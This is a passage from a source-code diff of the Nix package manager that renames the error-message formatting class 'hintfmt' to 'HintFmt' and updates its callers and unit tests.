@@ std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer); * magenta. */ template<> -hintformat & hintformat::operator%(const ValuePrinter & value); +HintFmt & HintFmt::operator%(const ValuePrinter & value); } diff --git a/src/libexpr/value-to-json.cc b/src/libexpr/value-to-json.cc index b2f116390..3f877a7fd 100644 --- a/src/libexpr/value-to-json.cc +++ b/src/libexpr/value-to-json.cc @@ -64,7 +64,7 @@ json printValueAsJSON(EvalState & state, bool strict, out[j] = printValueAsJSON(state, strict, *a.value, a.pos, context, copyToStore); } catch (Error & e) { e.addTrace(state.positions[a.pos], - hintfmt("while evaluating attribute '%1%'", j)); + HintFmt("while evaluating attribute '%1%'", j)); throw; } } @@ -81,7 +81,7 @@ json printValueAsJSON(EvalState & state, bool strict, out.push_back(printValueAsJSON(state, strict, *elem, pos, context, copyToStore)); } catch (Error & e) { e.addTrace(state.positions[pos], - hintfmt("while evaluating list element at index %1%", i)); + HintFmt("while evaluating list element at index %1%", i)); throw; } i++; diff --git a/src/libexpr/value/context.hh b/src/libexpr/value/context.hh index 2abd1c9d4..7f23cd3a4 100644 --- a/src/libexpr/value/context.hh +++ b/src/libexpr/value/context.hh @@ -19,8 +19,8 @@ public: : Error("") { raw = raw_; - auto hf = hintfmt(args...); - err.msg = hintfmt("Bad String Context element: %1%: %2%", Uncolored(hf.str()), raw); + auto hf = HintFmt(args...); + err.msg = HintFmt("Bad String Context element: %1%: %2%", Uncolored(hf.str()), raw); } }; diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index a2f411b8a..2f60d2f38 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -92,7 +92,7 @@ void handleDiffHook( } catch (Error & error) { ErrorInfo ei = error.info(); // FIXME: wrap errors. - ei.msg = hintfmt("diff hook execution failed: %s", ei.msg.str()); + ei.msg = HintFmt("diff hook execution failed: %s", ei.msg.str()); logError(ei); } } diff --git a/src/libstore/filetransfer.cc b/src/libstore/filetransfer.cc index eb39be158..ebfae346f 100644 --- a/src/libstore/filetransfer.cc +++ b/src/libstore/filetransfer.cc @@ -882,12 +882,12 @@ template FileTransferError::FileTransferError(FileTransfer::Error error, std::optional response, const Args & ... args) : Error(args...), error(error), response(response) { - const auto hf = hintfmt(args...); + const auto hf = HintFmt(args...); // FIXME: Due to https://github.com/NixOS/nix/issues/3841 we don't know how // to print different messages for different verbosity levels. For now // we add some heuristics for detecting when we want to show the response. if (response && (response->size() < 1024 || response->find("") != std::string::npos)) - err.msg = hintfmt("%1%\n\nresponse body:\n\n%2%", Uncolored(hf.str()), chomp(*response)); + err.msg = HintFmt("%1%\n\nresponse body:\n\n%2%", Uncolored(hf.str()), chomp(*response)); else err.msg = hf; } diff --git a/src/libstore/sqlite.cc b/src/libstore/sqlite.cc index ff14ec420..06abfb90b 100644 --- a/src/libstore/sqlite.cc +++ b/src/libstore/sqlite.cc @@ -10,11 +10,11 @@ namespace nix { -SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf) +SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, HintFmt && hf) : Error(""), path(path), errMsg(errMsg), errNo(errNo), extendedErrNo(extendedErrNo), offset(offset) { auto offsetStr = (offset == -1) ? "" : "at offset " + std::to_string(offset) + ": "; - err.msg = hintfmt("%s: %s%s, %s (in '%s')", + err.msg = HintFmt("%s: %s%s, %s (in '%s')", Uncolored(hf.str()), offsetStr, sqlite3_errstr(extendedErrNo), @@ -22,7 +22,7 @@ SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int ex path ? path : "(in-memory)"); } -[[noreturn]] void SQLiteError::throw_(sqlite3 * db, hintfmt && hf) +[[noreturn]] void SQLiteError::throw_(sqlite3 * db, HintFmt && hf) { int err = sqlite3_errcode(db); int exterr = sqlite3_extended_errcode(db); @@ -33,7 +33,7 @@ SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int ex if (err == SQLITE_BUSY || err == SQLITE_PROTOCOL) { auto exp = SQLiteBusy(path, errMsg, err, exterr, offset, std::move(hf)); - exp.err.msg = hintfmt( + exp.err.msg = HintFmt( err == SQLITE_PROTOCOL ? "SQLite database '%s' is busy (SQLITE_PROTOCOL)" : "SQLite database '%s' is busy", @@ -249,7 +249,7 @@ void handleSQLiteBusy(const SQLiteBusy & e, time_t & nextWarning) if (now > nextWarning) { nextWarning = now + 10; logWarning({ - .msg = hintfmt(e.what()) + .msg = HintFmt(e.what()) }); } diff --git a/src/libstore/sqlite.hh b/src/libstore/sqlite.hh index 33ebb5892..003e4d101 100644 --- a/src/libstore/sqlite.hh +++ b/src/libstore/sqlite.hh @@ -142,19 +142,19 @@ struct SQLiteError : Error template [[noreturn]] static void throw_(sqlite3 * db, const std::string & fs, const Args & ... args) { - throw_(db, hintfmt(fs, args...)); + throw_(db, HintFmt(fs, args...)); } - SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf); + SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, HintFmt && hf); protected: template SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, const std::string & fs, const Args & ... args) - : SQLiteError(path, errMsg, errNo, extendedErrNo, offset, hintfmt(fs, args...)) + : SQLiteError(path, errMsg, errNo, extendedErrNo, offset, HintFmt(fs, args...)) { } - [[noreturn]] static void throw_(sqlite3 * db, hintfmt && hf); + [[noreturn]] static void throw_(sqlite3 * db, HintFmt && hf); }; diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc index 01f64f211..47aa137d8 100644 --- a/src/libutil/current-process.cc +++ b/src/libutil/current-process.cc @@ -63,7 +63,7 @@ void setStackSize(rlim_t stackSize) if (setrlimit(RLIMIT_STACK, &limit) != 0) { logger->log( lvlError, - hintfmt( + HintFmt( "Failed to increase stack size from %1% to %2% (maximum allowed stack size: %3%): %4%", savedStackSize, stackSize, diff --git a/src/libutil/error.cc b/src/libutil/error.cc index e3b30b3a1..4a9efc0b5 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -11,7 +11,7 @@ namespace nix { -void BaseError::addTrace(std::shared_ptr && e, hintfmt hint, bool frame) +void BaseError::addTrace(std::shared_ptr && e, HintFmt hint, bool frame) { err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame }); } @@ -37,7 +37,7 @@ const std::string & BaseError::calcWhat() const std::optional ErrorInfo::programName = std::nullopt; -std::ostream & operator <<(std::ostream & os, const hintfmt & hf) +std::ostream & operator <<(std::ostream & os, const HintFmt & hf) { return os << hf.str(); } diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 966f4d770..2e5de5d32 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -63,7 +63,7 @@ void printCodeLines(std::ostream & out, struct Trace { std::shared_ptr pos; - hintfmt hint; + HintFmt hint; bool frame; }; @@ -74,7 +74,7 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; - hintfmt msg; + HintFmt msg; std::shared_ptr pos; std::list traces; @@ -113,20 +113,20 @@ public: template BaseError(unsigned int status, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(args...), .status = status } + : err { .level = lvlError, .msg = HintFmt(args...), .status = status } { } template explicit BaseError(const std::string & fs, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(fs, args...) } + : err { .level = lvlError, .msg = HintFmt(fs, args...) } { } template BaseError(const Suggestions & sug, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(args...), .suggestions = sug } + : err { .level = lvlError, .msg = HintFmt(args...), .suggestions = sug } { } - BaseError(hintfmt hint) + BaseError(HintFmt hint) : err { .level = lvlError, .msg = hint } { } @@ -159,10 +159,10 @@ public: template void addTrace(std::shared_ptr && e, std::string_view fs, const Args & ... args) { - addTrace(std::move(e), hintfmt(std::string(fs), args...)); + addTrace(std::move(e), HintFmt(std::string(fs), args...)); } - void addTrace(std::shared_ptr && e, hintfmt hint, bool frame = false); + void addTrace(std::shared_ptr && e, HintFmt hint, bool frame = false); bool hasTrace() const { return !err.traces.empty(); } @@ -214,8 +214,8 @@ public: SysError(int errNo, const Args & ... args) : SystemError(""), errNo(errNo) { - auto hf = hintfmt(args...); - err.msg = hintfmt("%1%: %2%", Uncolored(hf.str()), strerror(errNo)); + auto hf = HintFmt(args...); + err.msg = HintFmt("%1%: %2%", Uncolored(hf.str()), strerror(errNo)); } /** diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh index 9c2cc1e85..e996f4ba2 100644 --- a/src/libutil/fmt.hh +++ b/src/libutil/fmt.hh @@ -31,6 +31,17 @@ inline void formatHelper(F & f, const T & x, const Args & ... args) // Interpolate one argument and then recurse. formatHelper(f % x, args...); } + +/** + * Set the correct exceptions for `fmt`. + */ +void setExceptions(boost::format & fmt) +{ + fmt.exceptions( + boost::io::all_error_bits ^ + boost::io::too_many_args_bit ^ + boost::io::too_few_args_bit); +} } /** @@ -74,7 +85,7 @@ template inline std::string fmt(const std::string & fs, const Args & ... args) { boost::format f(fs); - f.exceptions(boost::io::all_error_bits ^ boost::io::too_many_args_bit); + setExceptions(f); formatHelper(f, args...); return f.str(); } @@ -82,9 +93,9 @@ inline std::string fmt(const std::string & fs, const Args & ... args) /** * Values wrapped in this struct are printed in magenta. * - * By default, arguments to `hintfmt` are printed in magenta. To avoid this, + * By default, arguments to `HintFmt` are printed in magenta. To avoid this, * either wrap the argument in `Uncolored` or add a specialization of - * `hintfmt::operator%`. + * `HintFmt::operator%`. */ template struct Magenta @@ -102,7 +113,7 @@ std::ostream & operator<<(std::ostream & out, const Magenta & y) /** * Values wrapped in this class are printed without coloring. * - * By default, arguments to `hintfmt` are printed in magenta (see `Magenta`). + * By default, arguments to `HintFmt` are printed in magenta (see `Magenta`). */ template struct Uncolored @@ -121,65 +132,49 @@ std::ostream & operator<<(std::ostream & out, const Uncolored & y) * A wrapper around `boost::format` which colors interpolated arguments in * magenta by default. */ -class hintfmt +class HintFmt { private: boost::format fmt; public: - /** - * Construct a `hintfmt` from a format string, with values to be - * interpolated later with `%`. - * - * This isn't exposed as a single-argument constructor to avoid - * accidentally constructing `hintfmt`s with user-controlled strings. See - * the note on `fmt` for more information. - */ - static hintfmt interpolate(const std::string & formatString) - { - hintfmt result((boost::format(formatString))); - result.fmt.exceptions( - boost::io::all_error_bits ^ - boost::io::too_many_args_bit ^ - boost::io::too_few_args_bit); - return result; - } - /** * Format the given string literally, without interpolating format * placeholders. */ - hintfmt(const std::string & literal) - : hintfmt("%s", Uncolored(literal)) + HintFmt(const std::string & literal) + : HintFmt("%s", Uncolored(literal)) { } /** * Interpolate the given arguments into the format string. */ template - hintfmt(const std::string & format, const Args & ... args) - : fmt(format) - { - formatHelper(*this, args...); - } + HintFmt(const std::string & format, const Args & ... args) + : HintFmt(boost::format(format), args...) + { } - hintfmt(const hintfmt & hf) + HintFmt(const HintFmt & hf) : fmt(hf.fmt) { } - hintfmt(boost::format && fmt) + template + HintFmt(boost::format && fmt, const Args & ... args) : fmt(std::move(fmt)) - { } + { + setExceptions(fmt); + formatHelper(*this, args...); + } template - hintfmt & operator%(const T & value) + HintFmt & operator%(const T & value) { fmt % Magenta(value); return *this; } template - hintfmt & operator%(const Uncolored & value) + HintFmt & operator%(const Uncolored & value) { fmt % value.value; return *this; @@ -191,6 +186,6 @@ public: } }; -std::ostream & operator<<(std::ostream & os, const hintfmt & hf); +std::ostream & operator<<(std::ostream & os, const HintFmt & hf); } diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index 7fc211491..70c16ff0d 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -448,7 +448,7 @@ Error readError(Source & source) auto msg = readString(source); ErrorInfo info { .level = level, - .msg = hintfmt(msg), + .msg = HintFmt(msg), }; auto havePos = readNum(source); assert(havePos == 0); @@ -457,7 +457,7 @@ Error readError(Source & source) havePos = readNum(source); assert(havePos == 0); info.traces.push_back(Trace { - .hint = hintfmt(readString(source)) + .hint = HintFmt(readString(source)) }); } return Error(std::move(info)); diff --git a/src/nix/daemon.cc b/src/nix/daemon.cc index 4dada8e0e..8afcbe982 100644 --- a/src/nix/daemon.cc +++ b/src/nix/daemon.cc @@ -377,7 +377,7 @@ static void daemonLoop(std::optional forceTrustClientOpt) } catch (Error & error) { auto ei = error.info(); // FIXME: add to trace? - ei.msg = hintfmt("error processing connection: %1%", ei.msg.str()); + ei.msg = HintFmt("error processing connection: %1%", ei.msg.str()); logError(ei); } } diff --git a/src/nix/eval.cc b/src/nix/eval.cc index 2e0837c8e..e6a022e5f 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -98,7 +98,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption } catch (Error & e) { e.addTrace( state->positions[attr.pos], - hintfmt("while evaluating the attribute '%s'", name)); + HintFmt("while evaluating the attribute '%s'", name)); throw; } } diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 646e4c831..4504bb22e 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -411,7 +411,7 @@ struct CmdFlakeCheck : FlakeCommand return storePath; } } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the derivation '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the derivation '%s'", attrPath)); reportError(e); } return std::nullopt; @@ -430,7 +430,7 @@ struct CmdFlakeCheck : FlakeCommand } #endif } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the app definition '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the app definition '%s'", attrPath)); reportError(e); } }; @@ -454,7 +454,7 @@ struct CmdFlakeCheck : FlakeCommand // FIXME: if we have a 'nixpkgs' input, use it to // evaluate the overlay. } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the overlay '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the overlay '%s'", attrPath)); reportError(e); } }; @@ -465,7 +465,7 @@ struct CmdFlakeCheck : FlakeCommand fmt("checking NixOS module '%s'", attrPath)); state->forceValue(v, pos); } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the NixOS module '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the NixOS module '%s'", attrPath)); reportError(e); } }; @@ -491,7 +491,7 @@ struct CmdFlakeCheck : FlakeCommand } } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the Hydra jobset '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the Hydra jobset '%s'", attrPath)); reportError(e); } }; @@ -506,7 +506,7 @@ struct CmdFlakeCheck : FlakeCommand if (!state->isDerivation(*vToplevel)) throw Error("attribute 'config.system.build.toplevel' is not a derivation"); } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the NixOS configuration '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the NixOS configuration '%s'", attrPath)); reportError(e); } }; @@ -540,7 +540,7 @@ struct CmdFlakeCheck : FlakeCommand throw Error("template '%s' has unsupported attribute '%s'", attrPath, name); } } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the template '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the template '%s'", attrPath)); reportError(e); } }; @@ -554,7 +554,7 @@ struct CmdFlakeCheck : FlakeCommand throw Error("bundler must be a function"); // TODO: check types of inputs/outputs? } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the template '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the template '%s'", attrPath)); reportError(e); } }; @@ -774,7 +774,7 @@ struct CmdFlakeCheck : FlakeCommand warn("unknown flake output '%s'", name); } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking flake output '%s'", name)); + e.addTrace(resolve(pos), HintFmt("while checking flake output '%s'", name)); reportError(e); } }); diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 3cfa2b61b..a899d3113 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -31,14 +31,14 @@ namespace nix { } } catch (BaseError & e) { ASSERT_EQ(PrintToString(e.info().msg), - PrintToString(hintfmt("puppy"))); + PrintToString(HintFmt("puppy"))); auto trace = e.info().traces.rbegin(); ASSERT_EQ(e.info().traces.size(), 2); ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("doggy"))); + PrintToString(HintFmt("doggy"))); trace++; ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("beans"))); + PrintToString(HintFmt("beans"))); throw; } , EvalError @@ -53,6 +53,7 @@ namespace nix { state.error("beans").debugThrow(); } catch (Error & e2) { e.addTrace(state.positions[noPos], "beans2", ""); + //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); ASSERT_FALSE(&e.info() == &e2.info()); @@ -73,7 +74,7 @@ namespace nix { ASSERT_EQ(e.info().traces.size(), 1) << "while testing " args << std::endl << e.what(); \ auto trace = e.info().traces.rbegin(); \ ASSERT_EQ(PrintToString(trace->hint), \ - PrintToString(hintfmt("while calling the '%s' builtin", name))); \ + PrintToString(HintFmt("while calling the '%s' builtin", name))); \ throw; \ } \ , type \ @@ -95,7 +96,7 @@ namespace nix { PrintToString(context)); \ ++trace; \ ASSERT_EQ(PrintToString(trace->hint), \ - PrintToString(hintfmt("while calling the '%s' builtin", name))); \ + PrintToString(HintFmt("while calling the '%s' builtin", name))); \ throw; \ } \ , type \ @@ -104,48 +105,48 @@ namespace nix { TEST_F(ErrorTraceTest, genericClosure) { ASSERT_TRACE2("genericClosure 1", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.genericClosure")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure {}", TypeError, - hintfmt("attribute '%s' missing", "startSet"), - hintfmt("in the attrset passed as argument to builtins.genericClosure")); + HintFmt("attribute '%s' missing", "startSet"), + HintFmt("in the attrset passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = 1; }", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = true; }", TypeError, - hintfmt("expected a function but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); + HintFmt("expected a function but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: true; }", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); + HintFmt("expected a list but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ true ]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); + HintFmt("expected a set but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ {} ]; }", TypeError, - hintfmt("attribute '%s' missing", "key"), - hintfmt("in one of the attrsets generated by (or initially passed to) builtins.genericClosure")); + HintFmt("attribute '%s' missing", "key"), + HintFmt("in one of the attrsets generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [{ key = ''a''; }]; }", EvalError, - hintfmt("cannot compare %s with %s", "a string", "an integer"), - hintfmt("while comparing the `key` attributes of two genericClosure elements")); + HintFmt("cannot compare %s with %s", "a string", "an integer"), + HintFmt("while comparing the `key` attributes of two genericClosure elements")); ASSERT_TRACE2("genericClosure { startSet = [ true ]; operator = item: [{ key = ''a''; }]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); + HintFmt("expected a set but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); } @@ -153,32 +154,32 @@ namespace nix { TEST_F(ErrorTraceTest, replaceStrings) { ASSERT_TRACE2("replaceStrings 0 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.replaceStrings")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "0" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [] 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.replaceStrings")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "0" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.replaceStrings")); ASSERT_TRACE1("replaceStrings [ 0 ] [] {}", EvalError, - hintfmt("'from' and 'to' arguments passed to builtins.replaceStrings have different lengths")); + HintFmt("'from' and 'to' arguments passed to builtins.replaceStrings have different lengths")); ASSERT_TRACE2("replaceStrings [ 1 ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"oo\" ] [ true ] \"foo\"", TypeError, - hintfmt("expected a string but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); + HintFmt("expected a string but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"old\" ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the third argument passed to builtins.replaceStrings")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the third argument passed to builtins.replaceStrings")); } @@ -242,8 +243,8 @@ namespace nix { TEST_F(ErrorTraceTest, ceil) { ASSERT_TRACE2("ceil \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.ceil")); + HintFmt("expected a float but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.ceil")); } @@ -251,8 +252,8 @@ namespace nix { TEST_F(ErrorTraceTest, floor) { ASSERT_TRACE2("floor \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.floor")); + HintFmt("expected a float but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.floor")); } @@ -264,8 +265,8 @@ namespace nix { TEST_F(ErrorTraceTest, getEnv) { ASSERT_TRACE2("getEnv [ ]", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.getEnv")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.getEnv")); } @@ -285,8 +286,8 @@ namespace nix { TEST_F(ErrorTraceTest, placeholder) { ASSERT_TRACE2("placeholder []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.placeholder")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.placeholder")); } @@ -294,13 +295,13 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.toPath")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", EvalError, - hintfmt("string '%s' doesn't represent an absolute path", "foo"), - hintfmt("while evaluating the first argument passed to builtins.toPath")); + HintFmt("string '%s' doesn't represent an absolute path", "foo"), + HintFmt("while evaluating the first argument passed to builtins.toPath")); } @@ -308,8 +309,8 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); + HintFmt("cannot coerce %s to a string: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -317,13 +318,13 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while realising the context of a path")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", EvalError, - hintfmt("string '%s' doesn't represent an absolute path", "zorglub"), - hintfmt("while realising the context of a path")); + HintFmt("string '%s' doesn't represent an absolute path", "zorglub"), + HintFmt("while realising the context of a path")); } @@ -331,8 +332,8 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -376,30 +377,30 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", EvalError, - hintfmt("string '%s' doesn't represent an absolute path", "foo"), - hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); + HintFmt("string '%s' doesn't represent an absolute path", "foo"), + HintFmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] ./.", TypeError, - hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.filterSource")); + HintFmt("expected a function but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.filterSource")); // Usupported by store "dummy" // ASSERT_TRACE2("filterSource (_: 1) ./.", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "an integer"), - // hintfmt("while adding path '/home/layus/projects/nix'")); + // HintFmt("attempt to call something which is not a function but %s", "an integer"), + // HintFmt("while adding path '/home/layus/projects/nix'")); // ASSERT_TRACE2("filterSource (_: _: 1) ./.", // TypeError, - // hintfmt("expected a Boolean but found %s: %s", "an integer", "1"), - // hintfmt("while evaluating the return value of the path filter function")); + // HintFmt("expected a Boolean but found %s: %s", "an integer", "1"), + // HintFmt("while evaluating the return value of the path filter function")); } @@ -411,8 +412,8 @@ namespace nix { TEST_F(ErrorTraceTest, attrNames) { ASSERT_TRACE2("attrNames []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the argument passed to builtins.attrNames")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while 